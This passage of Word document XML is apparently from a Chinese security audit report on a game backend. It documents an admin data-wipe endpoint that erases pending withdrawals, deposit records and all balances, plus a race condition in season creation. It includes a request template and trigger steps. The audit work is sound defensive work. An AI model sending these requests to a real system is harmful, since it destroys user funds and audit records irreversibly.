              <w:t xml:space="preserve">    └─ SecurityConfig: .authenticated() + AdminAuthFilter (验证 JWT, 注入 ATTR_ADMIN_IS_SUPER)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    └─ AdminWriteCsrfGuardFilter (Origin/Referer 校验)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    └─ SeasonBackupController.deleteSeasonData(@RequestAttribute isSuper)</w:t>
              <w:br/>
              <w:t xml:space="preserve">        └─ requireSuperAdmin(isSuper)       // 超管校验通过</w:t>
              <w:br/>
              <w:t xml:space="preserve">        └─ SeasonBackupManageService.deleteSeasonData()   // @Transactional</w:t>
              <w:br/>
              <w:t xml:space="preserve">            ├─ withdrawApplyRecordRepository.deleteAllInBatch()  // ← 漏洞点：无状态预检删除全量提现记录</w:t>
              <w:br/>
              <w:t xml:space="preserve">            ├─ userDepositRecordRepository.deleteAllInBatch()    // ← 漏洞点：全量充值历史销毁</w:t>
              <w:br/>
              <w:t xml:space="preserve">            ├─ userAccountCleanAll()</w:t>
              <w:br/>
              <w:t xml:space="preserve">            │     └─ userAccountRepository.updateAllAndSetBalanceZero()  // ← 漏洞点：全部账户余额归零</w:t>
              <w:br/>
              <w:t xml:space="preserve">            └─ userCleanAll()</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">                  └─ userRepository.updateAllAndSetBalanceZero()         // ← 漏洞点：全部用户余额归零</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入口：SeasonBackupController.java</w:t>
              <w:br/>
              <w:t>@PostMapping("/deleteSeasonData")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;Void&gt; deleteSeasonData(</w:t>
              <w:br/>
              <w:t xml:space="preserve">        @RequestAttribute(AdminAuthFilter.ATTR_ADMIN_IS_SUPER) Boolean isSuper) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    requireSuperAdmin(isSuper);                    // 超管校验</w:t>
              <w:br/>
              <w:t xml:space="preserve">    seasonBackupManageService.deleteSeasonData();  // ← 污点流向 Service 层</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success();</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② Service 层：SeasonBackupManageService.java</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public void deleteSeasonData() {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ... 其他非资金表删除 ...</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    withdrawApplyRecordRepository.deleteAllInBatch();  // ← 漏洞点：全量删除提现申请，PENDING/PROCESSING 记录同样被删</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userAccountCleanAll();                             // ← 漏洞点：全部账户余额清零</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    userDepositRecordRepository.deleteAllInBatch();    // ← 漏洞点：全量删除充值历史，资金审计链路彻底销毁</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    withdrawApplyRecordRepository.deleteAllInBatch();  // （同上，在同一事务中）</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ③ 余额归零：SeasonBackupManageService.java</w:t>
              <w:br/>
              <w:t>private void userCleanAll() {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userRepository.updateAllAndSetBalanceZero();       // ← 漏洞点：所有用户余额强制归零，不判断是否有在途资金</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>private void userAccountCleanAll() {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userAccountRepository.updateAllAndSetBalanceZero(); // ← 漏洞点：同上</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/seasonBackupManage/deleteSeasonData HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target-host&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;super-admin-jwt-token&gt;</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Content-Type: application/json</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862"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>前置条件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：确认系统中存在至少一笔状态为 PENDING 或 PROCESSING 的提现申请（即用户已提交提现、系统已扣减账户余额、链上交易已广播但尚未最终确认）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="863"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>触发操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：以超级管理员身份携带有效 Bearer Token，向 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>POST /seasonBackupManage/deleteSeasonData</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 发起请求；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="864"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>即时效果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@Transactional</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 事务提交后——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>withdrawApplyRecord</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 全表被删除（含上述在途提现记录）；全部用户账户余额被置为 0；全部充值历史被删除；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="865"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>资金损失路径 A（链上交易成功）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：区块链节点最终确认该提现交易，用户收到链上资产；但系统余额为 0、提现记录已不存在，账实永久不符，无法追溯；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="866"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>资金损失路径 B（链上交易失败）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：链上交易因 Gas 不足/超时等原因失败；系统无提现记录，无法触发自动退款逻辑；用户既未收到链上资产，账户余额又为 0，资金彻底消失；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="867"/>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：在途资金状态永久不可恢复，受影响用户数量等于触发时所有在途提现单的持有人数量。</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868"/>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869"/>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超级管理员</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>AdminAuthFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 注入 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>ATTR_ADMIN_IS_SUPER = true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，由 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>requireSuperAdmin()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 强制校验）</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资金影响：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="870"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>受影响金额上限</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：触发时所有处于 PENDING/PROCESSING 状态的提现单金额总和，外加全部用户的账户余额（被归零）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="871"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>损失性质</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：不可逆（提现记录和余额数据均被物理删除/清零，无法通过重跑流程恢复）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="872"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>额外风险</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：全量充值记录（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userDepositRecord</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）被删除后，平台失去对用户入金行为的所有审计凭证，为事后追溯欺诈或争议仲裁带来法律风险。</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建议修复方向（供参考）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">在执行删除前，增加在途资金状态预检：若 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>withdrawApplyRecord</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 中存在任意 PENDING/PROCESSING 状态记录，则拒绝执行并返回明确错误；只有全部提现单已处于终态（COMPLETED/FAILED/CANCELLED）且外部区块链侧确认完毕，才允许执行赛季清理。</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873"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SeasonBackupController.java.deleteSeasonData → SeasonBackupManageService.java.deleteSeasonData → SeasonBackupManageService.java.userCleanAll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audit_m186_688_deleteSeasonData_ctrl-path2of5.md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：SeasonManageService.java#create</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_40" w:id="40"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞39：赛季创建接口并发竞态条件（TOCTOU）— 可绕过时间重叠校验创建重复赛季</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="87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：赛季创建接口并发 TOCTOU 竞态，可绕过时间重叠校验</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="87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src/main/java/com/gameBack/mjservice/service/SeasonManageService.java:create</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="87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：业务逻辑漏洞 / 并发竞态（TOCTOU）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="87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7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：后台管理员（需通过 AdminAuthFilter 认证）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="87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SeasonManageService.create()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@Transactional</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 注解，在默认隔离级别（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>READ_COMMITTED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）下执行如下逻辑：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="880"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findAllByOrderByStartTimeAsc()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>读取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>当前所有赛季；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="881"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>遍历做时间重叠校验；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="882"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">若无重叠则 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>seasonConfigRepository.save(s)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>写入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>新赛季。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">此模式是典型的"读取后校验再写入"（TOCTOU）。在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>READ_COMMITTED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 隔离级别下，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>两个并发事务可以同时读到同一批旧数据，互不感知对方的写入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，均通过重叠校验，最终各自提交，导致数据库中写入两条时间段完全相同或互相重叠的赛季记录。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>在奖池金额（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>prizePoolAmount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）不为零的生产环境中，重复赛季会破坏奖池账务完整性：依赖赛季标识做奖励分发的下游逻辑可能对同一批用户执行两次发奖，造成资金损失。即使不考虑恶意利用，运营人员因并发点击也可能意外触发此缺陷。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="883"/>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/seasonManage/create</w:t>
              <w:br/>
              <w:t xml:space="preserve">  → AdminAuthFilter（鉴权通过）</w:t>
              <w:br/>
              <w:t xml:space="preserve">  → AdminWriteCsrfGuardFilter（Origin/Referer 校验通过）</w:t>
              <w:br/>
              <w:t xml:space="preserve">  → SeasonManageController.create()</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">  → SeasonManageService.create()   ← TOCTOU 竞态点</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">用户可控字段 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>startTime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 经过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@RequestBody</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 反序列化后直接作为新赛季的开始时间，时间重叠校验逻辑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>只在应用层内存中执行，没有借助数据库行锁或分布式锁保证原子性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="884"/>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：奖池金额字段 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>prizePoolAmount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
